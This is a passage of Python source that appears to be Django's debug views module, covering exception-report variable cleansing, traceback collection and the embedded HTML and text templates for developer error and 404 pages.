if sensitive_variables == '__ALL__':
# Cleanse all variables
for name, value in tb_frame.f_locals.items():
cleansed[name] = CLEANSED_SUBSTITUTE
else:
# Cleanse specified variables
for name, value in tb_frame.f_locals.items():
if name in sensitive_variables:
value = CLEANSED_SUBSTITUTE
else:
value = self.cleanse_special_types(request, value)
cleansed[name] = value
else:
# Potentially cleanse the request and any MultiValueDicts if they
# are one of the frame variables.
for name, value in tb_frame.f_locals.items():
cleansed[name] = self.cleanse_special_types(request, value)
if (tb_frame.f_code.co_name == 'sensitive_variables_wrapper' and
'sensitive_variables_wrapper' in tb_frame.f_locals):
# For good measure, obfuscate the decorated function's arguments in
# the sensitive_variables decorator's frame, in case the variables
# associated with those arguments were meant to be obfuscated from
# the decorated function's frame.
cleansed['func_args'] = CLEANSED_SUBSTITUTE
cleansed['func_kwargs'] = CLEANSED_SUBSTITUTE
return cleansed.items()
class ExceptionReporter(object):
"""
A class to organize and coordinate reporting on exceptions.
"""
def __init__(self, request, exc_type, exc_value, tb, is_email=False):
self.request = request
self.filter = get_exception_reporter_filter(self.request)
self.exc_type = exc_type
self.exc_value = exc_value
self.tb = tb
self.is_email = is_email
self.template_info = getattr(self.exc_value, 'template_debug', None)
self.template_does_not_exist = False
self.postmortem = None
# Handle deprecated string exceptions
if isinstance(self.exc_type, six.string_types):
self.exc_value = Exception('Deprecated String Exception: %r' % self.exc_type)
self.exc_type = type(self.exc_value)
def get_traceback_data(self):
"""Return a dictionary containing traceback information."""
if self.exc_type and issubclass(self.exc_type, TemplateDoesNotExist):
self.template_does_not_exist = True
self.postmortem = self.exc_value.chain or [self.exc_value]
frames = self.get_traceback_frames()
for i, frame in enumerate(frames):
if 'vars' in frame:
frame_vars = []
for k, v in frame['vars']:
v = pprint(v)
# The force_escape filter assume unicode, make sure that works
if isinstance(v, six.binary_type):
v = v.decode('utf-8', 'replace') # don't choke on non-utf-8 input
# Trim large blobs of data
if len(v) > 4096:
v = '%s... <trimmed %d bytes string>' % (v[0:4096], len(v))
frame_vars.append((k, force_escape(v)))
frame['vars'] = frame_vars
frames[i] = frame
unicode_hint = ''
if self.exc_type and issubclass(self.exc_type, UnicodeError):
start = getattr(self.exc_value, 'start', None)
end = getattr(self.exc_value, 'end', None)
if start is not None and end is not None:
unicode_str = self.exc_value.args[1]
unicode_hint = force_text(
unicode_str[max(start - 5, 0):min(end + 5, len(unicode_str))],
'ascii', errors='replace'
)
from django import get_version
c = {
'is_email': self.is_email,
'unicode_hint': unicode_hint,
'frames': frames,
'request': self.request,
'filtered_POST_items': self.filter.get_post_parameters(self.request).items(),
'settings': get_safe_settings(),
'sys_executable': sys.executable,
'sys_version_info': '%d.%d.%d' % sys.version_info[0:3],
'server_time': timezone.now(),
'django_version_info': get_version(),
'sys_path': sys.path,
'template_info': self.template_info,
'template_does_not_exist': self.template_does_not_exist,
'postmortem': self.postmortem,
}
if self.request is not None:
c['request_GET_items'] = self.request.GET.items()
c['request_FILES_items'] = self.request.FILES.items()
c['request_COOKIES_items'] = self.request.COOKIES.items()
# Check whether exception info is available
if self.exc_type:
c['exception_type'] = self.exc_type.__name__
if self.exc_value:
c['exception_value'] = force_text(self.exc_value, errors='replace')
if frames:
c['lastframe'] = frames[-1]
return c
def get_traceback_html(self):
"Return HTML version of debug 500 HTTP error page."
t = DEBUG_ENGINE.from_string(TECHNICAL_500_TEMPLATE)
c = Context(self.get_traceback_data(), use_l10n=False)
return t.render(c)
def get_traceback_text(self):
"Return plain text version of debug 500 HTTP error page."
t = DEBUG_ENGINE.from_string(TECHNICAL_500_TEXT_TEMPLATE)
c = Context(self.get_traceback_data(), autoescape=False, use_l10n=False)
return t.render(c)
def _get_lines_from_file(self, filename, lineno, context_lines, loader=None, module_name=None):
"""
Returns context_lines before and after lineno from file.
Returns (pre_context_lineno, pre_context, context_line, post_context).
"""
source = None
if loader is not None and hasattr(loader, "get_source"):
try:
source = loader.get_source(module_name)
except ImportError:
pass
if source is not None:
source = source.splitlines()
if source is None:
try:
with open(filename, 'rb') as fp:
source = fp.read().splitlines()
except (OSError, IOError):
pass
if source is None:
return None, [], None, []
# If we just read the source from a file, or if the loader did not
# apply tokenize.detect_encoding to decode the source into a Unicode
# string, then we should do that ourselves.
if isinstance(source[0], six.binary_type):
encoding = 'ascii'
for line in source[:2]:
# File coding may be specified. Match pattern from PEP-263
# (http://www.python.org/dev/peps/pep-0263/)
match = re.search(br'coding[:=]\s*([-\w.]+)', line)
if match:
encoding = match.group(1).decode('ascii')
break
source = [six.text_type(sline, encoding, 'replace') for sline in source]
lower_bound = max(0, lineno - context_lines)
upper_bound = lineno + context_lines
pre_context = source[lower_bound:lineno]
context_line = source[lineno]
post_context = source[lineno + 1:upper_bound]
return lower_bound, pre_context, context_line, post_context
def get_traceback_frames(self):
def explicit_or_implicit_cause(exc_value):
explicit = getattr(exc_value, '__cause__', None)
implicit = getattr(exc_value, '__context__', None)
return explicit or implicit
# Get the exception and all its causes
exceptions = []
exc_value = self.exc_value
while exc_value:
exceptions.append(exc_value)
exc_value = explicit_or_implicit_cause(exc_value)
frames = []
# No exceptions were supplied to ExceptionReporter
if not exceptions:
return frames
# In case there's just one exception (always in Python 2,
# sometimes in Python 3), take the traceback from self.tb (Python 2
# doesn't have a __traceback__ attribute on Exception)
exc_value = exceptions.pop()
tb = self.tb if six.PY2 or not exceptions else exc_value.__traceback__
while tb is not None:
# Support for __traceback_hide__ which is used by a few libraries
# to hide internal frames.
if tb.tb_frame.f_locals.get('__traceback_hide__'):
tb = tb.tb_next
continue
filename = tb.tb_frame.f_code.co_filename
function = tb.tb_frame.f_code.co_name
lineno = tb.tb_lineno - 1
loader = tb.tb_frame.f_globals.get('__loader__')
module_name = tb.tb_frame.f_globals.get('__name__') or ''
pre_context_lineno, pre_context, context_line, post_context = self._get_lines_from_file(
filename, lineno, 7, loader, module_name,
)
if pre_context_lineno is not None:
frames.append({
'exc_cause': explicit_or_implicit_cause(exc_value),
'exc_cause_explicit': getattr(exc_value, '__cause__', True),
'tb': tb,
'type': 'django' if module_name.startswith('django.') else 'user',
'filename': filename,
'function': function,
'lineno': lineno + 1,
'vars': self.filter.get_traceback_frame_variables(self.request, tb.tb_frame),
'id': id(tb),
'pre_context': pre_context,
'context_line': context_line,
'post_context': post_context,
'pre_context_lineno': pre_context_lineno + 1,
})
# If the traceback for current exception is consumed, try the
# other exception.
if six.PY2:
tb = tb.tb_next
elif not tb.tb_next and exceptions:
exc_value = exceptions.pop()
tb = exc_value.__traceback__
else:
tb = tb.tb_next
return frames
def format_exception(self):
"""
Return the same data as from traceback.format_exception.
"""
import traceback
frames = self.get_traceback_frames()
tb = [(f['filename'], f['lineno'], f['function'], f['context_line']) for f in frames]
list = ['Traceback (most recent call last):\n']
list += traceback.format_list(tb)
list += traceback.format_exception_only(self.exc_type, self.exc_value)
return list
def technical_404_response(request, exception):
"Create a technical 404 error response. The exception should be the Http404."
try:
error_url = exception.args[0]['path']
except (IndexError, TypeError, KeyError):
error_url = request.path_info[1:] # Trim leading slash
try:
tried = exception.args[0]['tried']
except (IndexError, TypeError, KeyError):
tried = []
else:
if (not tried or ( # empty URLconf
request.path == '/' and
len(tried) == 1 and # default URLconf
len(tried[0]) == 1 and
getattr(tried[0][0], 'app_name', '') == getattr(tried[0][0], 'namespace', '') == 'admin'
)):
return default_urlconf(request)
urlconf = getattr(request, 'urlconf', settings.ROOT_URLCONF)
if isinstance(urlconf, types.ModuleType):
urlconf = urlconf.__name__
caller = ''
try:
resolver_match = resolve(request.path)
except Resolver404:
pass
else:
obj = resolver_match.func
if hasattr(obj, '__name__'):
caller = obj.__name__
elif hasattr(obj, '__class__') and hasattr(obj.__class__, '__name__'):
caller = obj.__class__.__name__
if hasattr(obj, '__module__'):
module = obj.__module__
caller = '%s.%s' % (module, caller)
t = DEBUG_ENGINE.from_string(TECHNICAL_404_TEMPLATE)
c = Context({
'urlconf': urlconf,
'root_urlconf': settings.ROOT_URLCONF,
'request_path': error_url,
'urlpatterns': tried,
'reason': force_bytes(exception, errors='replace'),
'request': request,
'settings': get_safe_settings(),
'raising_view_name': caller,
})
return HttpResponseNotFound(t.render(c), content_type='text/html')
def default_urlconf(request):
"Create an empty URLconf 404 error response."
t = DEBUG_ENGINE.from_string(DEFAULT_URLCONF_TEMPLATE)
c = Context({
"title": _("Welcome to Django"),
"heading": _("It worked!"),
"subheading": _("Congratulations on your first Django-powered page."),
"instructions": _(
"Of course, you haven't actually done any work yet. "
"Next, start your first app by running <code>python manage.py startapp [app_label]</code>."
),
"explanation": _(
"You're seeing this message because you have <code>DEBUG = True</code> in your "
"Django settings file and you haven't configured any URLs. Get to work!"
),
})
return HttpResponse(t.render(c), content_type='text/html')
#
# Templates are embedded in the file so that we know the error handler will
# always work even if the template loader is broken.
#
TECHNICAL_500_TEMPLATE = ("""
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta name="robots" content="NONE,NOARCHIVE">
<title>{% if exception_type %}{{ exception_type }}{% else %}Report{% endif %}"""
r"""{% if request %} at {{ request.path_info|escape }}{% endif %}</title>
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; }
h2 { margin-bottom:.8em; }
h2 span { font-size:80%; color:#666; font-weight:normal; }
h3 { margin:1em 0 .5em 0; }
h4 { margin:0 0 .5em 0; font-weight: normal; }
code, pre { font-size: 100%; white-space: pre-wrap; }
table { border:1px solid #ccc; border-collapse: collapse; width:100%; background:white; }
tbody td, tbody th { vertical-align:top; padding:2px 3px; }
thead th {
padding:1px 6px 1px 3px; background:#fefefe; text-align:left;
font-weight:normal; font-size:11px; border:1px solid #ddd;
}
tbody th { width:12em; text-align:right; color:#666; padding-right:.5em; }
table.vars { margin:5px 0 2px 40px; }
table.vars td, table.req td { font-family:monospace; }
table td.code { width:100%; }
table td.code pre { overflow:hidden; }
table.source th { color:#666; }
table.source td { font-family:monospace; white-space:pre; border-bottom:1px solid #eee; }
ul.traceback { list-style-type:none; color: #222; }
ul.traceback li.frame { padding-bottom:1em; color:#666; }
ul.traceback li.user { background-color:#e0e0e0; color:#000 }
div.context { padding:10px 0; overflow:hidden; }
div.context ol { padding-left:30px; margin:0 10px; list-style-position: inside; }
div.context ol li { font-family:monospace; white-space:pre; color:#777; cursor:pointer; padding-left: 2px; }
div.context ol li pre { display:inline; }
div.context ol.context-line li { color:#505050; background-color:#dfdfdf; padding: 3px 2px; }
div.context ol.context-line li span { position:absolute; right:32px; }
.user div.context ol.context-line li { background-color:#bbb; color:#000; }
.user div.context ol li { color:#666; }
div.commands { margin-left: 40px; }
div.commands a { color:#555; text-decoration:none; }
.user div.commands a { color: black; }
#summary { background: #ffc; }
#summary h2 { font-weight: normal; color: #666; }
#explanation { background:#eee; }
#template, #template-not-exist { background:#f6f6f6; }
#template-not-exist ul { margin: 0 0 10px 20px; }
#template-not-exist .postmortem-section { margin-bottom: 3px; }
#unicode-hint { background:#eee; }
#traceback { background:#eee; }
#requestinfo { background:#f6f6f6; padding-left:120px; }
#summary table { border:none; background:transparent; }
#requestinfo h2, #requestinfo h3 { position:relative; margin-left:-100px; }
#requestinfo h3 { margin-bottom:-1em; }
.error { background: #ffc; }
.specific { color:#cc3300; font-weight:bold; }
h2 span.commands { font-size:.7em;}
span.commands a:link {color:#5E5694;}
pre.exception_value { font-family: sans-serif; color: #666; font-size: 1.5em; margin: 10px 0 10px 0; }
.append-bottom { margin-bottom: 10px; }
</style>
{% if not is_email %}
<script type="text/javascript">
//<!--
function getElementsByClassName(oElm, strTagName, strClassName){
// Written by Jonathan Snook, http://www.snook.ca/jon; Add-ons by Robert Nyman, http://www.robertnyman.com
var arrElements = (strTagName == "*" && document.all)? document.all :
oElm.getElementsByTagName(strTagName);
var arrReturnElements = new Array();
strClassName = strClassName.replace(/\-/g, "\\-");
var oRegExp = new RegExp("(^|\\s)" + strClassName + "(\\s|$)");
var oElement;
for(var i=0; i<arrElements.length; i++){
oElement = arrElements[i];
if(oRegExp.test(oElement.className)){
arrReturnElements.push(oElement);
}
}
return (arrReturnElements)
}
function hideAll(elems) {
for (var e = 0; e < elems.length; e++) {
elems[e].style.display = 'none';
}
}
window.onload = function() {
hideAll(getElementsByClassName(document, 'table', 'vars'));
hideAll(getElementsByClassName(document, 'ol', 'pre-context'));
hideAll(getElementsByClassName(document, 'ol', 'post-context'));
hideAll(getElementsByClassName(document, 'div', 'pastebin'));
}
function toggle() {
for (var i = 0; i < arguments.length; i++) {
var e = document.getElementById(arguments[i]);
if (e) {
e.style.display = e.style.display == 'none' ? 'block': 'none';
}
}
return false;
}
function varToggle(link, id) {
toggle('v' + id);
var s = link.getElementsByTagName('span')[0];
var uarr = String.fromCharCode(0x25b6);
var darr = String.fromCharCode(0x25bc);
s.textContent = s.textContent == uarr ? darr : uarr;
return false;
}
function switchPastebinFriendly(link) {
s1 = "Switch to copy-and-paste view";
s2 = "Switch back to interactive view";
link.textContent = link.textContent.trim() == s1 ? s2: s1;
toggle('browserTraceback', 'pastebinTraceback');
return false;
}
//-->
</script>
{% endif %}
</head>
<body>
<div id="summary">
<h1>{% if exception_type %}{{ exception_type }}{% else %}Report{% endif %}"""
"""{% if request %} at {{ request.path_info|escape }}{% endif %}</h1>
<pre class="exception_value">"""
"""{% if exception_value %}{{ exception_value|force_escape }}{% else %}No exception message supplied{% endif %}"""
"""</pre>
<table class="meta">
{% if request %}
<tr>
<th>Request Method:</th>
<td>{{ request.META.REQUEST_METHOD }}</td>
</tr>
<tr>
<th>Request URL:</th>
<td>{{ request.get_raw_uri|escape }}</td>
</tr>
{% endif %}
<tr>
<th>Django Version:</th>
<td>{{ django_version_info }}</td>
</tr>
{% if exception_type %}
<tr>
<th>Exception Type:</th>
<td>{{ exception_type }}</td>
</tr>
{% endif %}
{% if exception_type and exception_value %}
<tr>
<th>Exception Value:</th>
<td><pre>{{ exception_value|force_escape }}</pre></td>
</tr>
{% endif %}
{% if lastframe %}
<tr>
<th>Exception Location:</th>
<td>{{ lastframe.filename|escape }} in {{ lastframe.function|escape }}, line {{ lastframe.lineno }}</td>
</tr>
{% endif %}
<tr>
<th>Python Executable:</th>
<td>{{ sys_executable|escape }}</td>
</tr>
<tr>
<th>Python Version:</th>
<td>{{ sys_version_info }}</td>
</tr>
<tr>
<th>Python Path:</th>
<td><pre>{{ sys_path|pprint }}</pre></td>
</tr>
<tr>
<th>Server time:</th>
<td>{{server_time|date:"r"}}</td>
</tr>
</table>
</div>
{% if unicode_hint %}
<div id="unicode-hint">
<h2>Unicode error hint</h2>
<p>The string that could not be encoded/decoded was: <strong>{{ unicode_hint|force_escape }}</strong></p>
</div>
{% endif %}
{% if template_does_not_exist %}
<div id="template-not-exist">
<h2>Template-loader postmortem</h2>
{% if postmortem %}
<p class="append-bottom">Django tried loading these templates, in this order:</p>
{% for entry in postmortem %}
<p class="postmortem-section">Using engine <code>{{ entry.backend.name }}</code>:</p>
<ul>
{% if entry.tried %}
{% for attempt in entry.tried %}
<li><code>{{ attempt.0.loader_name }}</code>: {{ attempt.0.name }} ({{ attempt.1 }})</li>
{% endfor %}
{% else %}
<li>This engine did not provide a list of tried templates.</li>
{% endif %}
</ul>
{% endfor %}
{% else %}
<p>No templates were found because your 'TEMPLATES' setting is not configured.</p>
{% endif %}
</div>
{% endif %}
{% if template_info %}
<div id="template">
<h2>Error during template rendering</h2>
<p>In template <code>{{ template_info.name }}</code>, error at line <strong>{{ template_info.line }}</strong></p>
<h3>{{ template_info.message }}</h3>
<table class="source{% if template_info.top %} cut-top{% endif %}
{% if template_info.bottom != template_info.total %} cut-bottom{% endif %}">
{% for source_line in template_info.source_lines %}
{% if source_line.0 == template_info.line %}
<tr class="error"><th>{{ source_line.0 }}</th>
<td>{{ template_info.before }}"""
"""<span class="specific">{{ template_info.during }}</span>"""
"""{{ template_info.after }}</td>
</tr>
{% else %}
<tr><th>{{ source_line.0 }}</th>
<td>{{ source_line.1 }}</td></tr>
{% endif %}
{% endfor %}
</table>
</div>
{% endif %}
{% if frames %}
<div id="traceback">
<h2>Traceback <span class="commands">{% if not is_email %}<a href="#" onclick="return switchPastebinFriendly(this);">
Switch to copy-and-paste view</a></span>{% endif %}
</h2>
{% autoescape off %}
<div id="browserTraceback">
<ul class="traceback">
{% for frame in frames %}
{% ifchanged frame.exc_cause %}{% if frame.exc_cause %}
<li><h3>
{% if frame.exc_cause_explicit %}
The above exception ({{ frame.exc_cause }}) was the direct cause of the following exception:
{% else %}
During handling of the above exception ({{ frame.exc_cause }}), another exception occurred:
{% endif %}
</h3></li>
{% endif %}{% endifchanged %}
<li class="frame {{ frame.type }}">
<code>{{ frame.filename|escape }}</code> in <code>{{ frame.function|escape }}</code>
{% if frame.context_line %}
<div class="context" id="c{{ frame.id }}">
{% if frame.pre_context and not is_email %}
<ol start="{{ frame.pre_context_lineno }}" class="pre-context" id="pre{{ frame.id }}">
{% for line in frame.pre_context %}
<li onclick="toggle('pre{{ frame.id }}', 'post{{ frame.id }}')"><pre>{{ line|escape }}</pre></li>
{% endfor %}
</ol>
{% endif %}
<ol start="{{ frame.lineno }}" class="context-line">
<li onclick="toggle('pre{{ frame.id }}', 'post{{ frame.id }}')"><pre>
""" """{{ frame.context_line|escape }}</pre>{% if not is_email %} <span>...</span>{% endif %}</li></ol>
{% if frame.post_context and not is_email %}
<ol start='{{ frame.lineno|add:"1" }}' class="post-context" id="post{{ frame.id }}">
{% for line in frame.post_context %}
<li onclick="toggle('pre{{ frame.id }}', 'post{{ frame.id }}')"><pre>{{ line|escape }}</pre></li>
{% endfor %}
</ol>
{% endif %}
</div>
{% endif %}
{% if frame.vars %}
<div class="commands">
{% if is_email %}
<h2>Local Vars</h2>
{% else %}
<a href="#" onclick="return varToggle(this, '{{ frame.id }}')"><span>▶</span> Local vars</a>
{% endif %}
</div>
<table class="vars" id="v{{ frame.id }}">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in frame.vars|dictsort:0 %}
<tr>
<td>{{ var.0|force_escape }}</td>
<td class="code"><pre>{{ var.1 }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% endif %}
</li>
{% endfor %}
</ul>
</div>
{% endautoescape %}
<form action="http://dpaste.com/" name="pasteform" id="pasteform" method="post">
{% if not is_email %}
<div id="pastebinTraceback" class="pastebin">
<input type="hidden" name="language" value="PythonConsole">
<input type="hidden" name="title"
value="{{ exception_type|escape }}{% if request %} at {{ request.path_info|escape }}{% endif %}">
<input type="hidden" name="source" value="Django Dpaste Agent">
<input type="hidden" name="poster" value="Django">
<textarea name="content" id="traceback_area" cols="140" rows="25">
Environment:
{% if request %}
Request Method: {{ request.META.REQUEST_METHOD }}
Request URL: {{ request.get_raw_uri|escape }}
{% endif %}
Django Version: {{ django_version_info }}
Python Version: {{ sys_version_info }}
Installed Applications:
{{ settings.INSTALLED_APPS|pprint }}
Installed Middleware:
{% if settings.MIDDLEWARE is not None %}{{ settings.MIDDLEWARE|pprint }}"""
"""{% else %}{{ settings.MIDDLEWARE_CLASSES|pprint }}{% endif %}
{% if template_does_not_exist %}Template loader postmortem
{% if postmortem %}Django tried loading these templates, in this order:
{% for entry in postmortem %}
Using engine {{ entry.backend.name }}:
{% if entry.tried %}{% for attempt in entry.tried %}"""
""" * {{ attempt.0.loader_name }}: {{ attempt.0.name }} ({{ attempt.1 }})
{% endfor %}{% else %} This engine did not provide a list of tried templates.
{% endif %}{% endfor %}
{% else %}No templates were found because your 'TEMPLATES' setting is not configured.
{% endif %}{% endif %}{% if template_info %}
Template error:
In template {{ template_info.name }}, error at line {{ template_info.line }}
{{ template_info.message }}"""
"{% for source_line in template_info.source_lines %}"
"{% if source_line.0 == template_info.line %}"
" {{ source_line.0 }} : {{ template_info.before }} {{ template_info.during }} {{ template_info.after }}"
"{% else %}"
" {{ source_line.0 }} : {{ source_line.1 }}"
"""{% endif %}{% endfor %}{% endif %}
Traceback:{% for frame in frames %}
{% ifchanged frame.exc_cause %}{% if frame.exc_cause %}{% if frame.exc_cause_explicit %}
The above exception ({{ frame.exc_cause }}) was the direct cause of the following exception:
{% else %}
During handling of the above exception ({{ frame.exc_cause }}), another exception occurred:
{% endif %}{% endif %}{% endifchanged %}
File "{{ frame.filename|escape }}" in {{ frame.function|escape }}
{% if frame.context_line %} {{ frame.lineno }}. {{ frame.context_line|escape }}{% endif %}{% endfor %}
Exception Type: {{ exception_type|escape }}{% if request %} at {{ request.path_info|escape }}{% endif %}
Exception Value: {{ exception_value|force_escape }}
</textarea>
<br><br>
<input type="submit" value="Share this traceback on a public website">
</div>
</form>
</div>
{% endif %}
{% endif %}
<div id="requestinfo">
<h2>Request information</h2>
{% if request %}
{% if request.user %}
<h3 id="user-info">USER</h3>
<p>{{ request.user }}</p>
{% endif %}
<h3 id="get-info">GET</h3>
{% if request.GET %}
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for k, v in request_GET_items %}
<tr>
<td>{{ k }}</td>
<td class="code"><pre>{{ v|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>No GET data</p>
{% endif %}
<h3 id="post-info">POST</h3>
{% if filtered_POST_items %}
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for k, v in filtered_POST_items %}
<tr>
<td>{{ k }}</td>
<td class="code"><pre>{{ v|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>No POST data</p>
{% endif %}
<h3 id="files-info">FILES</h3>
{% if request.FILES %}
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for k, v in request_FILES_items %}
<tr>
<td>{{ k }}</td>
<td class="code"><pre>{{ v|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>No FILES data</p>
{% endif %}
<h3 id="cookie-info">COOKIES</h3>
{% if request.COOKIES %}
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for k, v in request_COOKIES_items %}
<tr>
<td>{{ k }}</td>
<td class="code"><pre>{{ v|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>No cookie data</p>
{% endif %}
<h3 id="meta-info">META</h3>
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in request.META.items|dictsort:0 %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>Request data not supplied</p>
{% endif %}
<h3 id="settings-info">Settings</h3>
<h4>Using settings module <code>{{ settings.SETTINGS_MODULE }}</code></h4>
<table class="req">
<thead>
<tr>
<th>Setting</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in settings.items|dictsort:0 %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
</div>
{% if not is_email %}
<div id="explanation">
<p>
You're seeing this error because you have <code>DEBUG = True</code> in your
Django settings file. Change that to <code>False</code>, and Django will
display a standard page generated by the handler for this status code.
</p>
</div>
{% endif %}
</body>
</html>
""") # NOQA
TECHNICAL_500_TEXT_TEMPLATE = (""""""
"""{% firstof exception_type 'Report' %}{% if request %} at {{ request.path_info }}{% endif %}
{% firstof exception_value 'No exception message supplied' %}
{% if request %}
Request Method: {{ request.META.REQUEST_METHOD }}
Request URL: {{ request.get_raw_uri }}{% endif %}
Django Version: {{ django_version_info }}
Python Executable: {{ sys_executable }}
Python Version: {{ sys_version_info }}
Python Path: {{ sys_path }}
Server time: {{server_time|date:"r"}}
Installed Applications:
{{ settings.INSTALLED_APPS|pprint }}
Installed Middleware:
{% if settings.MIDDLEWARE is not None %}{{ settings.MIDDLEWARE|pprint }}"""
"""{% else %}{{ settings.MIDDLEWARE_CLASSES|pprint }}{% endif %}
{% if template_does_not_exist %}Template loader postmortem
{% if postmortem %}Django tried loading these templates, in this order:
{% for entry in postmortem %}
Using engine {{ entry.backend.name }}:
{% if entry.tried %}{% for attempt in entry.tried %}"""
""" * {{ attempt.0.loader_name }}: {{ attempt.0.name }} ({{ attempt.1 }})
{% endfor %}{% else %} This engine did not provide a list of tried templates.
{% endif %}{% endfor %}
{% else %}No templates were found because your 'TEMPLATES' setting is not configured.
{% endif %}
{% endif %}{% if template_info %}
Template error:
In template {{ template_info.name }}, error at line {{ template_info.line }}
{{ template_info.message }}
{% for source_line in template_info.source_lines %}"""
"{% if source_line.0 == template_info.line %}"
" {{ source_line.0 }} : {{ template_info.before }} {{ template_info.during }} {{ template_info.after }}"
"{% else %}"
" {{ source_line.0 }} : {{ source_line.1 }}"
"""{% endif %}{% endfor %}{% endif %}{% if frames %}
Traceback:"""
"{% for frame in frames %}"
"{% ifchanged frame.exc_cause %}"
" {% if frame.exc_cause %}" """
{% if frame.exc_cause_explicit %}
The above exception ({{ frame.exc_cause }}) was the direct cause of the following exception:
{% else %}
During handling of the above exception ({{ frame.exc_cause }}), another exception occurred:
{% endif %}
{% endif %}
{% endifchanged %}
File "{{ frame.filename }}" in {{ frame.function }}
{% if frame.context_line %} {{ frame.lineno }}. {{ frame.context_line }}{% endif %}
{% endfor %}
{% if exception_type %}Exception Type: {{ exception_type }}{% if request %} at {{ request.path_info }}{% endif %}
{% if exception_value %}Exception Value: {{ exception_value }}{% endif %}{% endif %}{% endif %}
{% if request %}Request information:
{% if request.user %}USER: {{ request.user }}{% endif %}
GET:{% for k, v in request_GET_items %}
{{ k }} = {{ v|stringformat:"r" }}{% empty %} No GET data{% endfor %}
POST:{% for k, v in filtered_POST_items %}
{{ k }} = {{ v|stringformat:"r" }}{% empty %} No POST data{% endfor %}
FILES:{% for k, v in request_FILES_items %}
{{ k }} = {{ v|stringformat:"r" }}{% empty %} No FILES data{% endfor %}
COOKIES:{% for k, v in request_COOKIES_items %}
{{ k }} = {{ v|stringformat:"r" }}{% empty %} No cookie data{% endfor %}
META:{% for k, v in request.META.items|dictsort:0 %}
{{ k }} = {{ v|stringformat:"r" }}{% endfor %}
{% else %}Request data not supplied
{% endif %}
Settings:
Using settings module {{ settings.SETTINGS_MODULE }}{% for k, v in settings.items|dictsort:0 %}
{{ k }} = {{ v|stringformat:"r" }}{% endfor %}
{% if not is_email %}
You're seeing this error because you have DEBUG = True in your
Django settings file. Change that to False, and Django will
display a standard page generated by the handler for this status code.
{% endif %}
""") # NOQA
TECHNICAL_404_TEMPLATE = """
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<title>Page not found at {{ request.path_info|escape }}</title>
<meta name="robots" content="NONE,NOARCHIVE">
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; background:#eee; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; margin-bottom:.4em; }
h1 span { font-size:60%; color:#666; font-weight:normal; }
table { border:none; border-collapse: collapse; width:100%; }
td, th { vertical-align:top; padding:2px 3px; }
th { width:12em; text-align:right; color:#666; padding-right:.5em; }
#info { background:#f6f6f6; }
#info ol { margin: 0.5em 4em; }
#info ol li { font-family: monospace; }
#summary { background: #ffc; }
#explanation { background:#eee; border-bottom: 0px none; }
</style>
</head>
<body>
<div id="summary">
<h1>Page not found <span>(404)</span></h1>
<table class="meta">
<tr>
<th>Request Method:</th>
<td>{{ request.META.REQUEST_METHOD }}</td>
</tr>
<tr>
<th>Request URL:</th>
<td>{{ request.build_absolute_uri|escape }}</td>
</tr>
{% if raising_view_name %}
<tr>
<th>Raised by:</th>
<td>{{ raising_view_name }}</td>
</tr>
{% endif %}
</table>
</div>
<div id="info">
{% if urlpatterns %}
<p>
Using the URLconf defined in <code>{{ urlconf }}</code>,
Django tried these URL patterns, in this order:
</p>
<ol>
{% for pattern in urlpatterns %}
<li>
{% for pat in pattern %}
{{ pat.regex.pattern }}
{% if forloop.last and pat.name %}[name='{{ pat.name }}']{% endif %}
{% endfor %}
</li>
{% endfor %}
</ol>
<p>
{% if request_path %}
The current path, <code>{{ request_path|escape }}</code>,{% else %}
The empty path{% endif %} didn't match any of these.
</p>
{% else %}
<p>{{ reason }}</p>
{% endif %}
</div>
<div id="explanation">
<p>
You're seeing this error because you have <code>DEBUG = True</code> in
your Django settings file. Change that to <code>False</code>, and Django
will display a standard 404 page.
</p>
</div>
</body>
</html>
"""
DEFAULT_URLCONF_TEMPLATE = """
<!DOCTYPE html>
<html lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta name="robots" content="NONE,NOARCHIVE"><title>{{ title }}</title>
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; }
h2 { margin-bottom:.8em; }
h2 span { font-size:80%; color:#666; font-weight:normal; }
h3 { margin:1em 0 .5em 0; }
h4 { margin:0 0 .5em 0; font-weight: normal; }
table { border:1px solid #ccc; border-collapse: collapse; width:100%; background:white; }
tbody td, tbody th { vertical-align:top; padding:2px 3px; }
thead th {
padding:1px 6px 1px 3px; background:#fefefe; text-align:left;
font-weight:normal; font-size:11px; border:1px solid #ddd;
}
tbody th { width:12em; text-align:right; color:#666; padding-right:.5em; }
#summary { background: #e0ebff; }
